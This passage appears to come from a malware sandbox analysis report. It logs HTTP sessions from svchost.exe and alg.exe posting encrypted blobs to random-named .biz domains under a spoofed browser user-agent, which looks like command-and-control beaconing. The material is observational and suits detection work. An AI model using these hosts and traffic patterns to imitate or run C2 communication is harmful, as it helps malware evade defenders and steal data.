                                                                                                                                                                                                                                                                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 65 f9 60 f6 44 d4 ab c5 fe 02 00 00 82 71 fd d8 e6 a2 86 96 38 67 10 f6 87 69 a9 0c a1 cc 6c d2 c3 59 c3 3f 86 bf 47 3f 9e 4e 52 2b 9d a3 dc c6 94 31 11 66 da 57 d3 e4 42 97 49 62 8a e6 51 d7 3f c0 de ed c2 c5 65 9b 8f a1 0a e6 29 ed b1 9f f5 39 92 a3 10 ff bf 0a 1f 72 21 0d dc 83 57 8e ba c6 ad d3 ef f4 44 07 cf 0c 40 ab e8 15 2f d1 a4 b3 43 4f 4a 51 21 8c 68 e2 27 d4 5f d1 5c 1e fa 51 d5 c3 67 c9 3d d1 14 03 e5 2d 1b 16 77 e3 ab 77 1e 7e ce 50 5d 85 0f 13 a7 b6 e9 df cc d8 9e 04 2c 56 57 bd f3 24 15 d9 89 40 ca 6a a6 c9 07 e8 9b 7b 59 e6 18 4e 3b 3b 82 f7 eb 9b f3 55 3a 9b af d6 8b 9c 32 c7 17 c5 d6 8c 67 07 7f 6a cc 72 2e d8 b7 99 61 a2 0c 87 ef 35 8d 21 b3 4d 5e 7e a3 81 d4 7b 4d cc 05 8a 45 9e c9 80 4d 17 d9 a6 59 11 4d 07 1e 21 10 d5 1d dc cd 0a a2 14 f0 5f fa ea 75 d4 1e 79 1a 18 87 4e 1e 33 18 f2 e1 30 8c e2 bb e8 9b d6 20 0e 5f 94 b9 10 e8 f4 bb 15 04 00 b8 5f 51 1a c9 64 ef 9c 0c a2 95 9b 7e 54 fa 7e 9f 4b ff 19 0e cd 8a ed fb 99 e7 c5 ee 57 b5 c7 2c c0 97 2e 97 3c 83 99 31 72 ba 65 96 36 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e`Dq8gilY?G?NR+1fWBIbQ?e)9r!WD@/COJQ!h'_\Qg=-ww~P],VW$@j{YN;;U:2gjr.a5!M^~{MEMYM!_uyN30 __Qd~T~KW,.<1re6W)F-ue{C~h{@3xV~x2Sc.L{#Sr7dh$&5)b<ng@P'q T=Q!]cH5TFhvUOZIM '9IaOkW&\u7 |+?+#Y|2,uAuo#Z<6xuk4KM%769]@4D:/~s,T6@NTc2l<:@j u#8PCTIuP}Or 8E1~_34@E4$4\G}f
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:59.832426071 CEST1135OUTPOST /dqlfliuucamv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 65 f9 60 f6 44 d4 ab c5 fe 02 00 00 82 71 fd d8 e6 a2 86 96 38 67 10 f6 87 69 a9 0c a1 cc 6c d2 c3 59 c3 3f 86 bf 47 3f 9e 4e 52 2b 9d a3 dc c6 94 31 11 66 da 57 d3 e4 42 97 49 62 8a e6 51 d7 3f c0 de ed c2 c5 65 9b 8f a1 0a e6 29 ed b1 9f f5 39 92 a3 10 ff bf 0a 1f 72 21 0d dc 83 57 8e ba c6 ad d3 ef f4 44 07 cf 0c 40 ab e8 15 2f d1 a4 b3 43 4f 4a 51 21 8c 68 e2 27 d4 5f d1 5c 1e fa 51 d5 c3 67 c9 3d d1 14 03 e5 2d 1b 16 77 e3 ab 77 1e 7e ce 50 5d 85 0f 13 a7 b6 e9 df cc d8 9e 04 2c 56 57 bd f3 24 15 d9 89 40 ca 6a a6 c9 07 e8 9b 7b 59 e6 18 4e 3b 3b 82 f7 eb 9b f3 55 3a 9b af d6 8b 9c 32 c7 17 c5 d6 8c 67 07 7f 6a cc 72 2e d8 b7 99 61 a2 0c 87 ef 35 8d 21 b3 4d 5e 7e a3 81 d4 7b 4d cc 05 8a 45 9e c9 80 4d 17 d9 a6 59 11 4d 07 1e 21 10 d5 1d dc cd 0a a2 14 f0 5f fa ea 75 d4 1e 79 1a 18 87 4e 1e 33 18 f2 e1 30 8c e2 bb e8 9b d6 20 0e 5f 94 b9 10 e8 f4 bb 15 04 00 b8 5f 51 1a c9 64 ef 9c 0c a2 95 9b 7e 54 fa 7e 9f 4b ff 19 0e cd 8a ed fb 99 e7 c5 ee 57 b5 c7 2c c0 97 2e 97 3c 83 99 31 72 ba 65 96 36 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e`Dq8gilY?G?NR+1fWBIbQ?e)9r!WD@/COJQ!h'_\Qg=-ww~P],VW$@j{YN;;U:2gjr.a5!M^~{MEMYM!_uyN30 __Qd~T~KW,.<1re6W)F-ue{C~h{@3xV~x2Sc.L{#Sr7dh$&5)b<ng@P'q T=Q!]cH5TFhvUOZIM '9IaOkW&\u7 |+?+#Y|2,uAuo#Z<6xuk4KM%769]@4D:/~s,T6@NTc2l<:@j u#8PCTIuP}Or 8E1~_34@E4$4\G}f
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098336935 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:27:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ac58003ed01395622126f3a8e3c6836e|8.46.123.33|1728394079|1728394079|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098647118 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:27:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ac58003ed01395622126f3a8e3c6836e|8.46.123.33|1728394079|1728394079|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.099280119 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:27:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ac58003ed01395622126f3a8e3c6836e|8.46.123.33|1728394079|1728394079|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              3192.168.2.44973554.244.188.177804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.155926943 CEST348OUTPOST /tacyehq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.155951977 CEST786OUTData Raw: 1b 71 f3 0e 44 bf eb c3 06 03 00 00 bd 8b b9 91 45 63 df 2d af a6 79 82 40 91 d4 5e 95 36 e9 90 b7 12 51 0f 2b ce 5f 1d 43 9d 3c 93 df 16 cc 27 13 d9 e6 00 e2 80 14 2e c3 bb fa cb b6 07 ad 7c 2f 63 36 e3 f5 a0 87 35 90 29 86 ea db 85 23 28 d8 c1
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: qDEc-y@^6Q+_C<'.|/c65)#(?U:a:D8>JA]exn9FsEvNUYX$3TD8z(&a1C6d>Ew{;?lpIKMv|MR'-6[M5e]#[/t(1ZA
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.917686939 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=2f8e167369e3aaf8d14597ac8b1f2a07|8.46.123.33|1728394080|1728394080|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              4192.168.2.44973618.141.10.107802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.246228933 CEST346OUTPOST /aky HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.246285915 CEST778OUTData Raw: 83 8a 36 1b 1d b6 fc 27 fe 02 00 00 03 cb b1 c0 41 6f 6e 1d 61 16 19 29 2a c8 15 dd 0f 8e e6 52 df 9e 67 0b 53 96 a3 1d d4 02 59 fb 79 19 b1 90 05 f3 71 ad 9b 0d 22 f3 7c 2c 8a 74 cc 23 01 c5 11 20 1d 71 8e ec 11 01 ad a2 f5 5e 6e ea 55 f7 b0 50
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6'Aona)*RgSYyq"|,t# q^nUPk&#Gei5=I86%|z|}#E*F:dxn"Yc+*PU'P*+%2]O*q(m\uTl{8 -QzNY8A:gM8j(eFU
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.584125996 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=8aeac2e577bbdc9dad3e267316d96762|8.46.123.33|1728394081|1728394081|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              5192.168.2.44973744.221.84.105804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.959623098 CEST346OUTPOST /bh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.959644079 CEST786OUTData Raw: 42 44 5c ec 25 6c b2 c4 06 03 00 00 e5 32 66 7e 30 ed 9d 9f fc 28 73 60 23 83 e5 7f 1a d8 7e ad 01 9c a9 f4 ef 90 83 ff 66 fc 32 76 2e 04 f1 be dd a1 8d 87 86 d5 b4 1b d1 6e a2 c3 a5 29 de cb c2 f6 4d 2f 63 fd 1a dd ea e8 e0 d4 11 c2 11 c2 aa 03
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: BD\%l2f~0(s`#~f2v.n)M/c#frC?nZR=*HVr6Sx6tB6T'Tc@BMcas%U0zH8q1_oKBvqYA6>u4LjO)_x:8vrqJY^
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.450040102 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ba10ef5e1b2d810e359aa12d1ef8df07|8.46.123.33|1728394081|1728394081|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              6192.168.2.449739172.234.222.143804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.515834093 CEST347OUTPOST /xitm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.515866995 CEST786OUTData Raw: 88 fe 6f 53 ed 78 41 5b 06 03 00 00 a1 b6 fc b7 55 23 63 37 3b c5 58 d8 a4 17 62 06 ce 0f 8f e4 d4 b9 80 9a c1 67 67 9e f6 d5 3f c0 b9 af e9 6a 99 7a f4 68 bb 8f 8c e0 e8 b9 be 7a 85 6c 08 40 c4 87 18 e5 9b 41 50 6f 20 8c 86 3f cd 08 05 90 8d 44
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: oSxA[U#c7;Xbgg?jzhzl@APo ?D`&N4k*M;[R#W8~=&7kNWk=hV.`E;E)HzGR8Nx=]2$OEfD)9;kH4nUm ^&9\IGc


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              7192.168.2.44974054.244.188.177802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.695095062 CEST344OUTPOST /hbj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.695131063 CEST778OUTData Raw: 57 8b b5 15 d2 b4 b4 ef fe 02 00 00 96 bc 3c 41 ce 6c 00 1a be 6d e9 66 af 46 d5 da 8e 10 2a 9f 92 d4 d3 f5 22 8e c8 a8 a3 d7 13 f5 ac 01 9b 7e e2 37 e8 53 03 e5 40 4a 82 33 3e ee ae e7 e2 51 7b b0 72 36 70 e2 39 37 51 fd e8 1b 23 db 6c 57 b6 4b
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: W<AlmfF*"~7S@J3>Q{r6p97Q#lWKFI~xC]-i0-*alyP+H7qA:8z?(4yZq&+]B}zYm,W].fU#g|Wb)R(9c8S


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              8192.168.2.449741172.234.222.143804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.027410984 CEST349OUTPOST /gvnfcd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.027410984 CEST786OUTData Raw: 99 f1 ff c6 0c 18 4a e7 06 03 00 00 c7 a9 35 10 88 ca 8c e6 56 d6 3d 4e 79 0b 55 4f a0 c0 6e 96 4f c5 22 61 53 a1 3b 62 05 7d 48 5d f4 8a a6 a1 27 39 a6 4f 03 0a ba e8 ca 49 3f 60 6e 56 76 18 ba bb 9f ed 67 7b 07 54 fd b0 66 68 2a 6d ad 6b b5 a1
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: J5V=NyUOnO"aS;b}H]'9OI?`nVvg{Tfh*mk{#l5?6:K5.-hZ'4s+?M(Y VmF*Gok@Zf5]5-rMiQ|{(I"Q[0kPRTg#3R?wFF#L|PHBXMpx


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              9192.168.2.44974254.244.188.177802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.611717939 CEST347OUTPOST /elpwpt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.611735106 CEST778OUTData Raw: 65 01 00 7b d7 cb 85 86 fe 02 00 00 28 7b 61 19 44 56 22 5d 4d 8a d4 2a 62 66 12 ef 1a 37 88 cf 54 45 13 6a ab f0 ca fb f4 84 dd 87 d9 a3 ca 5a 0f 44 f8 cb 62 89 20 7f ec d2 64 65 ca 49 ee ed 79 b8 9e ce 13 05 60 d6 4a 7d 23 58 dd ef b0 01 6a a2
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e{({aDV"]M*bf7TEjZDb deIy`J}#Xj$Eio)""i8b0.w>y*SFL=ZzKi16jp>Ch;cs=P,}=$3w"|TmtGP[%|0
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:03.364165068 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=04ca5abcf7f9c47e7836816fe58e723c|8.46.123.33|1728394083|1728394083|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              10192.168.2.44974318.141.10.107804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.628978014 CEST357OUTPOST /yywraaixbnedu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.629056931 CEST786OUTData Raw: 75 05 0a 0e 3b b9 1e 7f 06 03 00 00 2b 13 af 24 38 39 3c 55 88 e0 bd c1 f4 e9 43 5f f2 0d 5d 08 03 95 5d 0f d6 d2 dd 67 4b f0 2c 46 d5 7a cd 0a 73 a2 07 65 9c 91 3c 52 0c c4 46 22 17 7a c7 a9 87 da 7b 4f ef 99 04 97 25 b6 f5 c7 5b 28 bf 7e f0 e7
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: u;+$89<UC_]]gK,Fzse<RF"z{O%[(~-jYo)J0Z@PJkYNFdb6R;muunTeFRI x3HOJ\4'(hl%{Gql|4f>M\ZDur8BJyNVkG`"
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.015014887 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
